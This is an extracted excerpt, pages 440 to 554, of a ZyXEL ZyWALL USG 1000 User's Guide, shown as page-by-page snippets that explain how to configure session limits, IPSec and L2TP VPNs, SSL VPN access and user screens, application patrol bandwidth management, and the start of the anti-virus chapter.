Page 440: ... to which this session limit rule applies Address This is the address object to which this session limit rule applies Limit This is how many concurrent sessions this user or address is allowed to have Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset to return the screen to its last saved settings Table 116 Configuration Firewall Session Limit continued LABEL DESCRIPTION ...

Page 441: ...address range Address Select a source address or address group for whom this rule applies Select any if the policy is effective for every source address Session Limit per Host Use this field to set a limit to the number of concurrent NAT firewall sessions this rule's users or addresses can have For this rule's users and addresses this setting overrides the Default Session per Host setting in the g...


Page 443: ...k like the Internet IPSec is built around a number of standardized cryptographic techniques to provide confidentiality data integrity and authentication at the IP layer The following figure is an example of an IPSec VPN tunnel Figure 320 IPSec VPN Example The VPN tunnel connects the ZyWALL X and the remote peer IPSec router Y These routers then connect the local network A and remote network B 25 1...

Page 444: ...ameters the ZyWALL and the remote IPSec router will use The first phase establishes an Internet Key Exchange IKE SA between the ZyWALL and remote IPSec router The second phase uses the IKE SA to securely establish an IPSec SA through which the ZyWALL and remote IPSec router can send data between computers on the local network and remote network This is illustrated in the following figure Figure 32...

Page 445: ...e IPSec router's address but you specify the remote policy the addresses of the devices behind the remote IPSec router This ZyWALL must have a static IP address or a domain name Only the remote IPSec router can initiate the VPN tunnel Choose this to allow incoming connections from IPSec VPN clients The clients have dynamic IP addresses and are also known as dial in users You don't specify the addr...

Page 446: ...virtual Ethernet interface VLAN interface or virtual VLAN interface to specify what address the ZyWALL uses as its IP address when it establishes the IKE SA You should set up the interface first See Chapter 13 on page 277 In a VPN gateway you can enable extended authentication If the ZyWALL is in server mode you should set up the authentication method AAA server first The authentication method spe...

Page 447: ...his to have the ZyWALL automatically obtain source and destination addresses for all dynamic IPSec rules See Section 6 4 2 on page 99 for how this option affects the routing table Ignore Don't Fragment setting in packet header Select this to fragment packets larger than the MTU Maximum Transmission Unit that have the don't fragment bit in the IP header turned on When you clear this the ZyWALL drop...

Page 448: ... bulb icon is lit when the entry is active and dimmed when the entry is inactive The connect icon is lit when the interface is connected and dimmed when it is disconnected Name This field displays the name of the IPSec SA VPN Gateway This field displays the associated VPN gateway(s) If there is no VPN gateway this field displays manual key Encapsulation This field displays what encapsulation the IP...

Page 449: ...Chapter 25 IPSec VPN ZyWALL USG 1000 User s Guide 449 Figure 323 Configuration VPN IPSec VPN VPN Connection Edit IKE ...

Page 450: ...BIOS packets to pass through IPSec SAs in order to allow local computers to find computers on the remote network and vice versa VPN Gateway Application Scenario Select the scenario that best describes your intended VPN connection Site to site Choose this if the remote IPSec router has a static IP address or a domain name This ZyWALL can initiate the VPN tunnel Site to site with Dynamic Peer Choose...

Page 451: ...e Protocol Select which protocol you want to use in the IPSec SA Choices are AH RFC 2402 provides integrity authentication sequence integrity replay resistance and non repudiation but not encryption If you select AH you must select an Authentication algorithm ESP RFC 2406 provides encryption and the same services offered by AH but its authentication is weaker If you select ESP you must select an E...

Page 452: ...SHA1 and MD5 SHA1 is generally considered stronger than MD5 but it is also slower The ZyWALL and the remote IPSec router must both have a proposal that uses the same authentication algorithm Perfect Forward Secrecy PFS Select whether or not you want to enable Perfect Forward Secrecy PFS and if you do which Diffie Hellman key group to use for encryption Choices are none disable PFS DH1 enable PFS a...

Page 453: ...st and Last IP Address in the Remote Policy Select this to have the ZyWALL check the connection to the first and last IP addresses in the connection's remote policy Make sure one of these is the peer gateway's LAN IP address Log Select this to have the ZyWALL generate a log every time it checks this VPN connection Inbound Outbound traffic NAT Outbound Traffic Source NAT This translation hides the ...

Page 454: ...click this to delete it Move To change an entry's position in the numbered list select it and click Move to display a field to type a number for where you want to put that entry and press ENTER to move the entry to the number that you typed This field is a sequential value and it is not associated with a specific NAT record However the order of records is the sequence in which conditions are check...

Page 455: ... either the Add icon or an existing manual key entry's Edit icon In the VPN Gateway section of the screen select Manual Key Note Only use manual key as a temporary solution because it is not as secure as a regular IPSec SA Figure 324 Configuration VPN IPSec VPN VPN Connection Add Manual Key This table describes labels specific to manual key configuration See Section 25 2 on page 446 for descriptio...

Page 456: ...ot encryption If you select AH you must select an Authentication Algorithm ESP RFC 2406 provides encryption and the same services offered by AH but its authentication is weaker If you select ESP you must select an Encryption Algorithm and Authentication Algorithm The ZyWALL and remote IPSec router must use the same protocol Encryption Algorithm This field is applicable when the Active Protocol is ...

Page 457: ...r 1234567890XYZ for a DES encryption key the ZyWALL only uses 12345678 The ZyWALL still stores the longer key Authentication Key Enter the authentication key which depends on the authentication algorithm MD5 type a unique key 16 20 characters long SHA1 type a unique key 20 characters long You can use any alphanumeric characters or _ If you want to enter the key in hexadecimal type 0x at the beginn...

Page 458: ...t to open a screen where you can modify the entry's settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Activate To turn on an entry select it and click Activate Inactivate To turn off an entry select it and click Inactivate Object References Select an entry and click Object References to open a screen that shows which settings us...

Page 459: ...policy or edit an existing one To access this screen go to the VPN Gateway summary screen see Section 25 3 on page 458 and click either the Add icon or an Edit icon Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset to return the screen to its last saved settings Table 122 Configuration VPN IPSec VPN VPN Gateway continued LABEL DESCRIPTION ...

Page 460: ...Chapter 25 IPSec VPN ZyWALL USG 1000 User s Guide 460 Figure 326 Configuration VPN IPSec VPN VPN Gateway Edit ...

Page 461: ...ress or the IP address corresponding to the domain name 0 0 0 0 is invalid Peer Gateway Address Select how the IP address of the remote IPSec router in the IKE SA is defined Select Static Address to enter the domain name or the IP address of the remote IPSec router You can provide a second IP address or domain name for the ZyWALL to try if it cannot establish an IKE SA with the first one Fall back...

Page 462: ...IKE SA Then select the certificate the ZyWALL uses to identify itself to the remote IPsec router This certificate is one of the certificates in My Certificates If this certificate is self signed import it into the remote IPsec router If this certificate is signed by a CA the remote IPsec router must trust that CA Note The IPSec routers must trust each other's certificates The ZyWALL uses one of it...

Page 463: ...ers including spaces although trailing spaces are truncated This value is only used for identification and can be any string E mail the ZyWALL is identified by an e mail address you can use up to 31 ASCII characters including spaces although trailing spaces are truncated This value is only used for identification and can be any string Peer ID Type Select which type of identification is used to ide...

Page 464: ...ect alternative name field see the note at the end of this description DNS subject alternative name field E mail subject alternative name field Subject Name subject name maximum 255 ASCII characters including spaces Note If Peer ID Type is IP please read the rest of this section If you type 0 0 0 0 the ZyWALL uses the IP address specified in the Secure Gateway Address field This is not recommended...

Page 465: ...DES encryption algorithm AES128 a 128 bit key with the AES encryption algorithm AES192 a 192 bit key with the AES encryption algorithm AES256 a 256 bit key with the AES encryption algorithm The ZyWALL and the remote IPSec router must use the same key size and encryption algorithm Longer keys require more processing power resulting in increased latency and decreased throughput Authentication Select...

Page 466: ...unnel for example use extended authentication to enforce a user name and password check This way even though they all know the VPN tunnel's security settings each still has to provide a unique user name and password Enable Extended Authentication Select this if one of the routers the ZyWALL or the remote IPSec router verifies a user name and password from the other router using the local user data...

Page 467: ...lidate the policy routes in each spoke router depending on the IP addresses and subnets of each spoke However a VPN concentrator is not for every situation The hub router is a single failure point so a VPN concentrator is not as appropriate if the connection between spoke routers cannot be down occasionally maintenance for example There is also more burden on the hub router It receives VPN traffic...

Page 468: ... IPSec VPN Concentrator Example This IPSec VPN concentrator example uses the following settings Branch Office A ZyNOS based ZyWALL VPN Gateway VPN Tunnel 1 My Address 10 0 0 2 Peer Gateway Address 10 0 0 1 VPN Connection VPN Tunnel 1 Local Policy 192 168 11 0 255 255 255 0 Remote Policy 192 168 1 0 255 255 255 0 Disable Policy Enforcement Policy Route Source 192 168 11 0 Destination 192 168 12 0 N...

Page 469: ...forcement Concentrator Add VPN tunnel 1 and VPN tunnel 2 to an IPSec VPN concentrator Firewall Block traffic from VPN tunnel 2 from accessing the LAN Branch Office B USG ZyWALL or ZyWALL 1050 VPN Gateway VPN Tunnel 2 My Address 10 0 0 3 Peer Gateway Address 10 0 0 1 VPN Connection VPN Tunnel 2 Local Policy 192 168 12 0 255 255 255 0 Remote Policy 192 168 1 0 255 255 255 0 Disable Policy Enforcemen...

Page 470: ...The VPN Concentrator summary screen displays the VPN concentrators in the ZyWALL To access this screen click Configuration VPN IPSec VPN Concentrator The following screen appears Figure 329 Configuration VPN IPSec VPN Concentrator Each field is discussed in the following table See Section 25 4 3 on page 470 for more information 25 4 3 The VPN Concentrator Add Edit Screen The VPN Concentrator Add E...

Page 471: ... the first character cannot be a number This value is case sensitive Member Select the concentrator's IPSec VPN connection policies Note You must disable policy enforcement in each member See Section 25 2 1 on page 448 IPSec VPN connection policies that do not belong to a VPN concentrator appear under Available Select any VPN connection policies that you want to add to the VPN concentrator and cli...

Page 472: ... IP address or a domain name for either or both IP addresses Sometimes your ZyWALL might offer another alternative such as using the IP address of a port or interface as well You can also specify the IP address of the remote IPSec router as 0 0 0 0 This means that the remote IPSec router can have any IP address In this case only the remote IPSec router can initiate an IKE SA because the ZyWALL doe...

Page 473: ...th of DES Advanced Encryption Standard AES is a newer method of data encryption that also uses a secret key AES applies a 128 bit key to 128 bit blocks of data It is faster than 3DES Some ZyWALLs also offer stronger forms of AES that apply 192 bit or 256 bit keys to 128 bit blocks of data In most ZyWALLs you can select one of the following authentication algorithms for each proposal The algorithms...

Page 474: ...her in steps 5 and 6 as illustrated below The identities are also encrypted using the encryption algorithm and encryption key the ZyWALL and remote IPSec router selected in previous steps Figure 333 IKE SA Main Negotiation Mode Steps 5 6 Authentication continued You have to create and distribute a pre shared key The ZyWALL and remote IPSec router use it in the authentication process though it is n...

Page 475: ...page 475 the ZyWALL and the remote IPSec router authenticate each other successfully In contrast in Table 127 on page 475 the ZyWALL and the remote IPSec router cannot authenticate each other and therefore cannot establish an IKE SA It is also possible to configure the ZyWALL to ignore the identity of the remote IPSec router In this case you usually set the peer ID type to Any This is less secure ...

Page 476: ...st aggressive mode only takes three steps to establish an IKE SA Aggressive mode does not provide as much security because the identity of the ZyWALL and the identity of the remote IPSec router are not encrypted It is usually used in remote access situations where the address of the initiator is not known by the responder and both parties want to use pre shared keys for authentication For example ...

Page 477: ... same VPN tunnel to connect to a single IPSec router For example this might be used with telecommuters In extended authentication one of the routers the ZyWALL or the remote IPSec router provides a user name and password to the other router which uses a local user database and or an external server to verify the user name and password If the user name or password is wrong the routers do not establ...

Page 478: ... to the remote IPSec router may be called the remote policy Active Protocol The active protocol controls the format of each packet It also specifies how much of each packet is protected by the encryption and authentication algorithms IPSec VPN includes two active protocols AH Authentication Header RFC 2402 and ESP Encapsulating Security Payload RFC 2406 Note The ZyWALL and remote IPSec router must...

Page 479: ...and Perfect Forward Secrecy An IPSec SA proposal is similar to an IKE SA proposal see IKE SA Proposal on page 472 except that you also have the choice whether or not the ZyWALL and remote IPSec router perform a new DH key exchange every time an IPSec SA is established This is called Perfect Forward Secrecy PFS If you enable PFS the ZyWALL and remote IPSec router perform a DH key exchange every tim...

Page 480: ...y several proposals There is no DH key exchange so you have to provide the encryption key and the authentication key the ZyWALL and remote IPSec router use Note The ZyWALL and remote IPSec router must use the same encryption key and authentication key Authentication and the Security Parameter Index SPI For authentication the ZyWALL and remote IPSec router use the SPI instead of pre shared keys ID ...

Page 481: ...twork B If you do not configure it the remote IPSec router may not route messages for computer M through the IPSec SA because computer M's IP address is not part of its local policy To set up this NAT you have to specify the following information Source the original source address most likely computer M's network Destination the original destination address the remote network B SNAT the translated...

Page 482: ... this kind of NAT The ZyWALL checks these rules similar to the way it checks rules for a firewall The first part of these rules defines the conditions in which the rule applies Original IP the original destination address the remote network B Protocol the protocol TCP UDP or both used by the service requesting the connection Original Port the original destination port or range of destination ports in...


Page 485: ...vice on your network for full tunnel mode access enter access messages or upload a custom logo to be displayed on the remote user screen 26 1 2 What You Need to Know There are two SSL VPN network access modes reverse proxy and full tunnel Reverse Proxy Mode In reverse proxy mode the ZyWALL is a proxy that acts on behalf of the local network servers such as your web and mail servers As the final de...

Page 486: ...twork Access Mode Full Tunnel Mode SSL Access Policy An SSL access policy allows the ZyWALL to perform the following tasks apply Endpoint Security EPS checking to require users' computers to comply with defined corporate policies before they can access the SSL VPN tunnel limit user access to specific applications or files on the network allow user access to specific networks assign private IP addre...

Page 487: ... Accounts User Account User Group Configure a user account or user group to which you want to apply this SSL access policy Endpoint Security Endpoint Security Endpoint Security EPS checking makes sure users' computers comply with defined corporate policies before they can access the SSL VPN tunnel Application SSL Application Configure an SSL application object to specify the type of application and...

Page 488: ... it and click Activate Inactivate To turn off an entry select it and click Inactivate Move To move an entry to a different number in the list click the Move icon In the field that appears specify the number to which you want to move the interface Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for...

Page 489: ...Apply Click Apply to save the settings Reset Click Reset to discard all changes Table 129 VPN SSL VPN Access Privilege LABEL DESCRIPTION ...

Page 490: ...26 2 1 The SSL Access Policy Add Edit Screen To create a new or edit an existing SSL access policy click the Add or Edit icon in the Access Privilege screen Figure 340 VPN SSL VPN Access Privilege Add Edit ...

Page 491: ...se fields to make sure users' computers meet an endpoint security object's Operating System OS and security requirements before granting access Enable EPS Checking Select this to have the ZyWALL check that users' computers meet the Operating System OS and security requirements of one of the SSL access policy's selected endpoint security objects before granting access Periodical checking time Select ...

Page 492: ... applications as defined by the selected SSL application settings and the remote user computers are not made to be a part of the local network Assign IP Pool Define a separate pool of IP addresses to assign to the SSL users Select it here The SSL VPN IP pool cannot overlap with IP addresses on the ZyWALL's local networks LAN and DMZ for example the SSL user's network or the networks you specify in...

Page 493: ...PN Login Domain Name SSL VPN Login Domain Name 1 2 Specify a domain name for users to use for SSL VPN login The domain name must be registered to one of the ZyWALL's IP addresses or be one of the ZyWALL's DDNS entries You can specify up to two domain names so you could use one domain name for each of two WAN ports Do not include the host For example www zyxel com is a fully qualified domain name w...

Page 494: ...eb browser on the remote user computer The ZyXEL company logo is the default logo Specify the location and file name of the logo graphic or click Browse to locate it Note The logo graphic must be GIF JPG or PNG format The graphic should use a resolution of 127 x 57 pixels to avoid distortion when displayed The ZyWALL automatically resizes a graphic of a different resolution to 127 x 57 pixels The ...

Page 495: ...4 Establishing an SSL VPN Connection After you have configured the SSL VPN settings on the ZyWALL use the ZyWALL login screen's SSL VPN button to establish an SSL VPN connection See Section 27 2 on page 500 for details 1 Display the ZyWALL's login screen and enter your user account information the user name and password Click SSL VPN Figure 343 Login Screen ...

Page 496: ...hould see the client portal screen The following shows an example Figure 344 SSL VPN Client Portal Screen Example If the user account is not set up for SSL VPN access an SSL VPN connection is not activated message displays in the Login screen Clear the Login to SSL VPN check box and try logging in again For more information on user portal screens refer to Chapter 27 on page 499 ...


Page 499: ...ok Web Access OWA Network Resource Access Methods As a remote user you can access resources on the local network using one of the following methods Using a supported web browser Once you have successfully logged in through the ZyWALL you can access intranet sites web based applications or web based e mails using one of the supported web browsers Using the ZyWALL SecuExtender client Once you have s...

Page 500: ...and access network resources the domain name or IP address of the ZyWALL the login account user name and password if also required the user name and or password to access the network resource Certificates The remote user's computer establishes an HTTPS connection to the ZyWALL to access the login screen If instructed by your network administrator you must install or import a certificate provided b...

Page 501: ... the Address in a Web Browser 2 Click OK or Yes if a security screen displays Figure 347 Login Security Screen 3 A login screen displays Enter the user name and password of your login account If a token password is also required enter it in the One Time Password field 4 Click SSL VPN to log in and establish an SSL VPN connection to the network to access network resources Figure 348 Login Screen ...

Page 502: ...et a message about needing Java download and install it and restart your browser and re login If a certificate warning screen displays click OK Yes or Continue Figure 349 Java Needed Message 6 The ZyWALL tries to install the SecuExtender client As shown next you may have to click some pop ups to get your browser to allow the installation Figure 350 ActiveX Object Installation Blocked by Browser ...

Page 503: ...Internet Explorer click Install Figure 351 SecuExtender Blocked by Internet Explorer 8 The ZyWALL tries to run the ssltun application You may need to click something to get your browser to allow this In Internet Explorer click Run Figure 352 SecuExtender Progress 9 Click Next to use the setup wizard to install the SecuExtender client on your computer Figure 353 SecuExtender Progress ...

Page 504: ...o finish installing the SecuExtender client on your computer Figure 354 Hardware Installation Warning 11 The Application screen displays showing the list of resources available to you See Figure 355 on page 505 for a screen example Note Available resource links vary depending on the configuration your network administrator made ...

Page 505: ...o to the Application or File Sharing screen 2 Click this icon to create a bookmark to the SSL VPN user screen in your web browser 3 Click this icon to display the on line help window 4 Click this icon to log out and terminate the secure connection 5 Select your preferred language for the interface 6 This part of the screen displays a list of the resources available to you In the Application screen...

Page 506: ... user screen, click the Add to Favorite icon. 2. A screen displays. Accept the default name in the Name field or enter a descriptive name to identify this link. 3. Click OK to create a bookmark in your web browser (Figure 356: Add Favorite). 27.5 Logging Out of the SSL VPN User Screens: To properly terminate a connection, click on the Logout icon in any remote user screen. 1. Click the Logout icon in any remote...

Page 507: ...apter 27 SSL User Screens, ZyWALL USG 1000 User's Guide, 507. 3. An information screen displays to indicate that the SSL VPN connection is about to terminate (Figure 358: Logout Connection Termination Progress). ...

Page 509: ...an access depends on the ZyWALL's configuration. 28.2 The Application Screen: Click the Application tab to display the screen. The Name field displays the descriptive name for an application. The Type field displays whether the application is a web site (Web Server) or web-based e-mail using Microsoft Outlook Web Access (OWA). To access a web-based application, simply click a link in the Application screen t...

Page 511: ...splay and access shared files/folders on a file server. You can also perform the following actions: Access a folder. Open a file (if your web browser cannot open the file, you are prompted to download it). Save a file to your computer. Create a new folder. Rename a file or folder. Delete a file or folder. Upload a file. Note: Available actions you can perform in the File Sharing screen vary depending on the ri...

Page 512: ...shared folder(s) available. The following figure shows an example with one file share (Figure 360: File Sharing). 29.3 Opening a File or Folder: You can open a file if the file extension is recognized by the web browser and the associated application is installed on your computer. 1. Log in as a remote user and click the File Sharing tab. 2. Click on a file share icon. ...

Page 513: ... 3. If an access user name and password are required, a screen displays as shown in the following figure. Enter the account information and click Login to continue (Figure 361: File Sharing Enter Access User Name and Password). ...

Page 514: ...lick a folder to access it. For this example, click on a .doc file to open the Word document (Figure 362: File Sharing Open a Word File). 29.3.1 Downloading a File: You are prompted to download a file which cannot be opened using a web browser. Follow the on-screen instructions to download and save the file to your computer. Then launch the associated application to open the file. ...

Page 515: ... the on-screen instructions (Figure 363: File Sharing Save a Word File). 29.4 Creating a New Folder: To create a new folder in the file share location, click the New Folder icon. Specify a descriptive name for the folder. You can enter up to 356 characters. Then click Add. Note: Make sure the length of the folder name does not exceed the maximum allowed on the file server. Figure 364: File Sharing Save a Word ...

Page 516: ...ndow displays. Specify the new name and/or file extension in the field provided. You can enter up to 356 characters. Then click Apply. Note: Make sure the length of the name does not exceed the maximum allowed on the file server. You may not be able to open a file if you change the file extension (Figure 366: File Sharing Rename). 29.6 Deleting a File or Folder: Click the Delete icon next to a file or folder...

Page 517: ...ify the location and/or name of the file you want to upload, or click Browse to locate it. 3. Click Upload to send the file to the file server. 4. After the file is uploaded successfully, you should see the name of the file and a message in the screen (Figure 367: File Sharing File Upload). Note: Uploading a file with the same name and file extension replaces the existing file on the file server. No warning m...

Page 519: ...lications must be installed on your computer. For example, to use the VNC remote desktop program, you must have the VNC client installed on your computer. 30.1 The ZyWALL SecuExtender Icon: The ZyWALL SecuExtender icon color indicates the SSL VPN tunnel's connection status (Figure 368: ZyWALL SecuExtender Icon). Red: the SSL VPN tunnel is not connected. You cannot connect to the SSL application and network r...

Page 520: ...e SSL VPN connection. DNS: Domain Name System maps a domain name to its corresponding IP address and vice versa. The DNS server is extremely important because without it you must know the IP address of a computer before you can access it. Your computer uses the DNS server specified here to resolve domain names for resources you access through the SSL VPN connection. WINS Server 1/2: These are the IP add...

Page 521: ...DESCRIPTION 2009 03 12 13 35 50 SecuExtender Agent DETAIL Build Datetime Feb 24 2009 10 25 07 2009 03 12 13 35 50 SecuExtender Agent DEBUG rasphone pbk C Documents and Settings 11746 rasphone pbk 2009 03 12 13 35 50 SecuExtender Agent DEBUG SecuExtender log C Documents and Settings 11746 SecuExtender log 2009 03 12 13 35 50 SecuExtender Agent DETAIL Check Parameters 2009 03 12 13 35 50 SecuExtende...

Page 522: ...d select Stop Connection to disconnect the SSL VPN tunnel. 30.6 Uninstalling the ZyWALL SecuExtender: Do the following if you need to remove the ZyWALL SecuExtender. 1. Click start > All Programs > ZyXEL > ZyWALL SecuExtender > Uninstall. 2. In the confirmation screen, click Yes (Figure 371: Uninstalling the ZyWALL SecuExtender Confirmation). 3. Windows uninstalls the ZyWALL SecuExtender (Figure 372: ZyWALL SecuExtende...

Page 523: ...reen (see Section 31.2 on page 525) to configure the ZyWALL's L2TP VPN settings. 31.1.2 What You Need to Know: The Layer 2 Tunneling Protocol (L2TP) works at layer 2 (the data link layer) to tunnel network traffic between two peers over another network (like the Internet). In L2TP VPN, an IPSec VPN tunnel is established first and then an L2TP tunnel is built inside it. See Chapter 25 on page 443 for informatio...

Page 524: ...address object in the local policy. For the Remote Policy, create an address object that uses host type and an IP address of 0.0.0.0. Use this address object in the remote policy. You must also edit the Default_L2TP_VPN_GW gateway entry. Configure the My Address setting according to your requirements. Replace the default Pre-Shared Key. Policy Route: You must configure a policy route to let remote users a...

Page 525: ...settings. Note: Disconnect any existing L2TP VPN sessions before modifying L2TP VPN settings. The remote users must make any needed matching configuration changes and re-establish the sessions using the new settings (Figure 375: Configuration > VPN > L2TP VPN). The following table describes the fields in this screen. Table 134: Configuration > VPN > IPSec VPN > VPN Connection. LABEL / DESCRIPTION. Create new Object: Use ...

Page 526: ...or user group that can use the L2TP VPN tunnel. Use Create new Object if you need to configure a new user account (see Section 40.2.1 on page 702 for details). Otherwise, select any to allow any user with a valid account and password on the ZyWALL to log in. Keep Alive Timer: The ZyWALL sends a Hello message after waiting this long without receiving any traffic from the remote user. The ZyWALL disconnects...

Page 527: ... VoIP call sound quality. 32.1.1 What You Can Do in this Chapter: Use the General summary screen (see Section 32.2 on page 537) to enable and disable application patrol. Use the Common, Instant Messenger, Peer to Peer, VoIP and Streaming screens (see Section 32.3 on page 538) to look at the applications the ZyWALL can recognize and review the settings for each one. You can also enable and disable the rules f...

Page 528: ...chedule, user, source and destination information. Your custom policies take priority over the policy's default settings. Classification of Applications: There are two ways the ZyWALL can identify the application. The first is called auto. The ZyWALL looks at the IP payload (OSI level 7 inspection) and attempts to match it with known patterns for specific applications. Usually this occurs at the beginning o...

Page 529: ... for every flow. In addition, applications do not have to request a particular service or give advanced notice of where the traffic is going. Use application patrol to set a DSCP value for an application's traffic that the ZyWALL sends out. Bandwidth Management: When you allow an application, you can restrict the bandwidth it uses or even the bandwidth that particular features in the application (like vo...

Page 530: ...ore sending the traffic out a LAN zone interface (Figure 376: LAN to WAN Connection and Packet Directions). Outbound and Inbound Bandwidth Limits: You can limit an application's outbound or inbound bandwidth. This limit keeps the traffic from using up too much of the out-going interface's bandwidth. This way you can make sure there is bandwidth for other applications. When you apply a bandwidth limit to o...

Page 531: ...e lowest priority. Maximize Bandwidth Usage: Maximize bandwidth usage allows applications with maximize bandwidth usage enabled to borrow any unused bandwidth on the out-going interface. After each application gets its configured bandwidth rate, the ZyWALL uses the fairness-based scheduler to divide any unused bandwidth on the out-going interface amongst applications that need more bandwidth and have ...

Page 532: ...s for server B. Maximize Bandwidth Usage Effect: With maximize bandwidth usage enabled, after each server gets its configured rate, the rest of the available bandwidth is divided equally between the two. So server A gets its configured rate of 300 kbps and server B gets its configured rate of 200 kbps. Then the ZyWALL divides the remaining bandwidth (1000 - 500 = 500) equally between the two (500 / 2 = 250 kbps fo...

Page 533: ...for a description of DSCP marking. 32.1.3 Application Patrol Bandwidth Management Examples: Bandwidth management is very useful when applications are competing for limited bandwidth. For example, say you have a WAN zone interface connected to an ADSL device with an 8 Mbps downstream and 1 Mbps upstream ADSL connection. The following sections give some simplified examples of using application patrol poli...

Page 534: ... 32.1.3.2 SIP Any to WAN Bandwidth Management Example: Manage SIP traffic going to the WAN zone from a VIP user on the LAN or DMZ. Outbound traffic to the WAN from the LAN and DMZ is limited to 200 kbps. The ZyWALL applies this limit before sending the traffic to the WAN. Inbound traffic to the LAN and DMZ from the WAN is also limited to 200 kbps. The ZyWALL applies this limit before sending the traffi...

Page 535: ...WAN to Any instead of Any to WAN. 32.1.3.4 HTTP Any to WAN Bandwidth Management Example: Inbound traffic gets more bandwidth, as the local users will probably download more than they upload and the ADSL connection supports this. Second highest priority (2). Set policies for other applications (except SIP) to lower priorities so the local users' HTTP traffic gets sent before non-SIP traffic. Enable maximize b...

Page 536: ... you do not want to give FTP more bandwidth (Figure 382: FTP WAN to DMZ Bandwidth Management Example). 32.1.3.6 FTP LAN to DMZ Bandwidth Management Example: The LAN and DMZ zone interfaces are connected to Ethernet networks (not an ADSL device), so you limit both outbound and inbound traffic to 50 Mbps. Fourth highest priority (4). Disable maximize bandwidth usage since you do not want to give FTP more bandwi...

Page 537: ...e 384: Configuration > App Patrol > General. The following table describes the labels in this screen. See Section 32.3.1 on page 539 for more information as well. Table 139: Configuration > App Patrol > General. LABEL / DESCRIPTION. Enable Application Patrol: Select this check box to turn on application patrol. Enable BWM: This is a global setting for enabling or disabling bandwidth management on the ZyWALL. You must ...

Page 538: ...ion Status: This field displays whether a service is activated (Licensed) or not (Not Licensed) or expired (Expired). Registration Type: This field displays whether you applied for a trial application (Trial) or registered a service with your iCard's PIN number (Standard). None displays when the service is not activated. Apply new Registration: This link appears if you have not registered for the service or only ...

Page 539: ...IPTION. Edit: Double-click an entry or select it and click Edit to open a screen where you can modify the entry's settings. Activate: To turn on an entry, select it and click Activate. Inactivate: To turn off an entry, select it and click Inactivate. This field is a sequential value and it is not associated with a specific application. Status: The activate (light bulb) icon is lit when the entry is active and ...

Page 540: ...is field displays the name of the application. Classification: Specify how the ZyWALL should identify this application. Choices are: Auto: the ZyWALL identifies this application by matching the IP payload with the application's pattern(s). Service Ports: the ZyWALL identifies this application by looking at the destination port in the IP header. Service Port: This is available if the Classification is Servic...

Page 541: ...Status: The activate (light bulb) icon is lit when the entry is active and dimmed when the entry is inactive. This field is a sequential value and it is not associated with a specific condition. Note: The ZyWALL checks conditions in the order they appear in the list. While this sequence does not affect the functionality, you might improve the performance of the ZyWALL by putting more common conditions at ...

Page 542: ...ds show the amount of bandwidth the application's traffic that matches the policy can use. These fields only apply when Access is set to forward. In: This is how much inbound bandwidth (in kilobits per second) this policy allows the application to use. Inbound refers to the traffic the ZyWALL sends to a connection's initiator. If no displays here, this policy does not apply bandwidth management for the ap...

Page 543: ... instant messenger service (Figure 387: Application Policy Edit). The following table describes the labels in this screen. OK: Click OK to save your changes back to the ZyWALL. Cancel: Click Cancel to exit this screen without saving your changes. Table 141: Application Edit (continued). LABEL / DESCRIPTION. Table 142: Application Policy Edit. LABEL / DESCRIPTION. Create new Object: Use to configure any new settings obj...

Page 544: ...effective for every destination. Access: This field controls what the ZyWALL does with packets for this application that match this policy. Choices are: forward: the ZyWALL routes the packets for this application. Drop: the ZyWALL does not route the packets for this application and does not notify the client of its decision. Reject: the ZyWALL does not route the packets for this application and notifies th...

Page 545: ...o the traffic the ZyWALL sends to a connection's initiator. If you enter 0 here, this policy does not apply bandwidth management for the application's traffic that the ZyWALL sends to the initiator. Traffic with bandwidth management disabled (inbound and outbound are both set to 0) is automatically treated as the lowest priority (7). If the sum of the bandwidths for routes using the same next hop is highe...

Page 546: ... gives traffic of an application with higher priority bandwidth before traffic of an application with lower priority. The ZyWALL uses a fairness-based (round-robin) scheduler to divide bandwidth between applications with the same priority. The number in this field is ignored if the incoming and outgoing limits are both set to 0. In this case, the traffic is automatically treated as being set to the lowe...

Page 547: ...entry to the number that you typed. Status: The activate (light bulb) icon is lit when the entry is active and dimmed when the entry is inactive. This field is a sequential value and it is not associated with a specific condition. Note: The ZyWALL checks conditions in the order they appear in the list. While this sequence does not affect the functionality, you might improve the performance of the ZyWALL by...

Page 548: ...or Assured Forwarding. The number following the af identifies one of four classes and one of three drop preferences. See Assured Forwarding (AF) PHB for DiffServ on page 359 for more details. BWM: These fields show the amount of bandwidth the traffic can use. These fields only apply when Access is set to forward. In: This is how much inbound bandwidth (in kilobits per second) this policy allows the matching ...

Page 549: ...he ZyWALL generate a log (log), log and alert (log alert) or neither (no) when traffic matches this policy. See Chapter 51 on page 845 for more on logs. Apply: Click Apply to save your changes back to the ZyWALL. Reset: Click Reset to return the screen to its last-saved settings. Table 143: AppPatrol > Other (continued). LABEL / DESCRIPTION. Table 144: AppPatrol > Other > Edit. LABEL / DESCRIPTION. Create new Object: Use to conf...

Page 550: ...TCP and UDP. Select any to apply the policy to both TCP and UDP traffic. Access: This field controls what the ZyWALL does with packets that match this policy. Choices are: forward: the ZyWALL routes the packets. Drop: the ZyWALL does not route the packets and does not notify the client of its decision. Reject: the ZyWALL does not route the packets and notifies the client of its decision. DSCP Marking: Set how...

Page 551: ...ty traffic uses all of the actual bandwidth. Priority: This field displays when the inbound or outbound bandwidth management is not set to 0. Enter a number between 1 and 7 to set the priority for traffic that matches this policy. The smaller the number, the higher the priority. Traffic with a higher priority is given bandwidth before traffic with a lower priority. The ZyWALL uses a fairness-based round ...

Page 552: ... OK: Click OK to save your changes back to the ZyWALL. Cancel: Click Cancel to exit this screen without saving your changes. Table 144: AppPatrol > Other > Edit (continued). LABEL / DESCRIPTION. ...

Page 553: ...es two interfaces to the LAN zone (Figure 390: ZyWALL Anti-Virus Example). 33.1.1 What You Can Do in this Chapter: Use the General screens (Section 33.2 on page 556) to turn anti-virus on or off, set up anti-virus policies, and check the anti-virus engine type and the anti-virus license and signature status. Use the Black/White List screen (Section 33.3 on page 561) to set up anti-virus black (blocked) and whit...

Page 554: ...self. The effect of a virus attack varies from doing so little damage that you are unaware your computer is infected, to wiping out the entire contents of a hard drive, to rendering your computer inoperable. ZyWALL Anti-Virus Scanner: The ZyWALL has a built-in signature database. Setting up the ZyWALL between your local network and the Internet allows the ZyWALL to scan files transmitted through the en...

